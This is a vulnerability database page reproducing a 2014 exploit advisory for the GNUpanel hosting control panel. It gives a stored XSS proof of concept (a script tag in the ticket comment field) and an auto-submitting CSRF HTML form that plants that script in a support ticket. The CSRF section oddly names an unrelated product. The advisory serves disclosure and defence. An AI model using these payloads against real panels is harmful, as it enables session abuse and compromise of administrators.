Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

GNUpanel 0.3.5_R4 Cross Site Request Forgery / Cross Site Scripting

🗓️ 12 Mar 2014 00:00:00Reported by Necmettin COSKUNType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 17 Views

GNUpanel 0.3.5_R4 Multiple Vulnerabilities - XSS & CSR

Code
`# Exploit Title :GNUpanel 0.3.5_R4 - Multiple Vulnerabilities  
# Vendor Homepage :http://wp.geeklab.com.ar/gl-en/gnupanel/  
# GNUPanel Version :0.3.5_R4  
# Server :Centos 6.4  
# Exploit Author :Necmettin COSKUN =>@babayarisi  
# Blog :http://www.ncoskun.com http://www.grisapka.org  
# Discovery date :03/11/2014  
# CVE :N/A  
  
GNUPanel is a hosting control panel for Debian. It is written in PHP and it is tailored to run on 32 and 64 bit Debian GNU/Linux web hosting servers.   
Description  
================  
Stored XSS vulnerability  
  
Vulnerability  
================  
GNUPanel has a pure coded ticket support system Comment "consultar" field is not ascaped so any  
tags including script tags can be stored in them.  
customer client can send malicious ticket to reseller client  
reseller client can send malicious ticket to Server Admin  
  
Proof of concept  
================  
Go to Support tab and click > New Ticket  
Set subject field Demo  
Set comment field "><script>alert("XSS");</script>  
Click Send.  
Go to Support tab and Click >Pending tickets  
Click read button Bingo XSS ;)  
================  
  
Second one:  
CSRF vulnerability  
================  
  
Description  
================  
CSRF vulnerability in BP Group Documents 1.2.1  
  
Vulnerability  
================  
An unauthenticated user can cause a logged in user to create support ticket including  
malicious code.  
  
Proof of concept  
================  
<html>  
<body>  
<form id="baba" method="post" action="http://demo/gnupanel-reseller.php?seccion=tickets&plugin=enviar_ticket">  
<input name="asunto" size="45" value="Demo12" maxlength="254">  
<textarea name="consultar" rows="10" cols="50"><script>alert("XSS");</script></textarea>  
<input name="ingresando" value="1" type="hidden">  
<input name="resetea" value="Reset" type="reset">  
<input name="agrega" value="Send" type="submit">  
</form>  
<script  
type="text/javascript">document.getElementById("baba").submit();  
</script>  
</body>  
</html>  
================  
  
Discovered by:  
================  
Necmettin COSKUN |GrisapkaGuvenlikGrubu|4ewa2getha!  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Mar 2014 00:00Current
gnupaneldebianphp32 bit64 bitlinuxxsscsrfvulnerabilitiescentos 6.4cross site request forgerycross site scriptingstored xsscsrf vulnerabilitysupport ticketpure codedproof of conceptdiscovery dateexploit authorserver adminreseller clientpending ticketsunauthenticated userbp group documents 1.2.1demomalicious codenecmettin coskungrisapkaguvenlikgrubu
17